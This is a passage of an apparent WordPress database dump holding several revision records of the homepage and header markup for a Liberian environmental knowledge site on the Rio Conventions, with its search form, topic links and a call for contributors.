id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-14 16:23:14','2019-11-14 16:23:14','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2132,1,'2019-11-14 16:24:54','2019-11-14 16:24:54','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:24:54','2019-11-14 16:24:54','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2133,1,'2019-11-14 16:27:28','2019-11-14 16:27:28','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:27:28','2019-11-14 16:27:28','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2134,1,'2019-11-14 16:27:51','2019-11-14 16:27:51','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Themes</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:27:51','2019-11-14 16:27:51','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2135,1,'2019-11-14 16:35:00','2019-11-14 16:35:00','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:35:00','2019-11-14 16:35:00','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2136,1,'2019-11-14 16:35:12','2019-11-14 16:35:12','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:35:12','2019-11-14 16:35:12','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2137,1,'2019-11-14 16:35:59','2019-11-14 16:35:59','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" 